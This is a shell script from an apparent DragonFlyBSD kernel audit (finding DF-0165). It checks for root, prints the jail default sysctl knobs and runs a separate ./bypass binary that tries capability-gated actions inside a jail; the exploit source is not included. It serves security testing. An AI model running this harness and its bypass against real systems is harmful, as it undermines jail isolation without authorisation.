DragonFlyBSD Kernel Audit
DF-0165 / run.sh
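#!/bin/sh
# DF-0165 run. Must be invoked as root on the guest.
#
# Prints the jail default policy knobs, then runs ./bypass from this
# script's directory. Per the banner below, ./bypass is what creates a jail
# with defaults (raw_sockets=0, vfs_mount_nullfs=0, etc.), attaches to it,
# and tries the cap-gated actions; its source is not part of this file.
#
# Outputs:     policy knobs and "RC=<status of ./bypass>" on stdout,
#              diagnostics on stderr.
# Exit status: that of ./bypass (1 if the preconditions below fail).
#              What each RC value means is defined by ./bypass.
set -eu

# The header requires root; fail early with a clear message instead of
# letting ./bypass fail later for an unrelated-looking reason.
if [ "$(id -u)" -ne 0 ]; then
  echo "run.sh: must be run as root" >&2
  exit 1
fi

cd "$(dirname "$0")" || {
  echo "run.sh: cannot cd to script directory" >&2
  exit 1
}

# Baseline: show the jail defaults and flag any that are not restrictive.
# The run is only meaningful as evidence for the finding when these are 0.
echo "---- jail default policy (should all be 0): ----"
baseline_ok=1
for knob in \
  jail.defaults.allow_raw_sockets \
  jail.defaults.vfs_mount_nullfs \
  jail.defaults.vfs_mount_tmpfs \
  jail.defaults.vfs_mount_devfs \
  jail.defaults.vfs_mount_procfs
do
  # A knob missing on this kernel is skipped quietly, as in the original
  # best-effort listing.
  sysctl "$knob" 2>/dev/null || continue
  value=$(sysctl -n "$knob" 2>/dev/null) || continue
  if [ "$value" != "0" ]; then
    baseline_ok=0
  fi
done
if [ "$baseline_ok" -ne 1 ]; then
  echo "WARNING: at least one jail default is non-zero; the guest is not" \
       "in the restrictive baseline, so the result below is not conclusive." >&2
fi

echo "---- running bypass as root (will create + enter jail): ----"
# Capture the status explicitly: under 'set -e' a bare './bypass' that
# returns non-zero would end the script before RC is ever printed.
rc=0
./bypass || rc=$?
echo "RC=$rc"
exit "$rc"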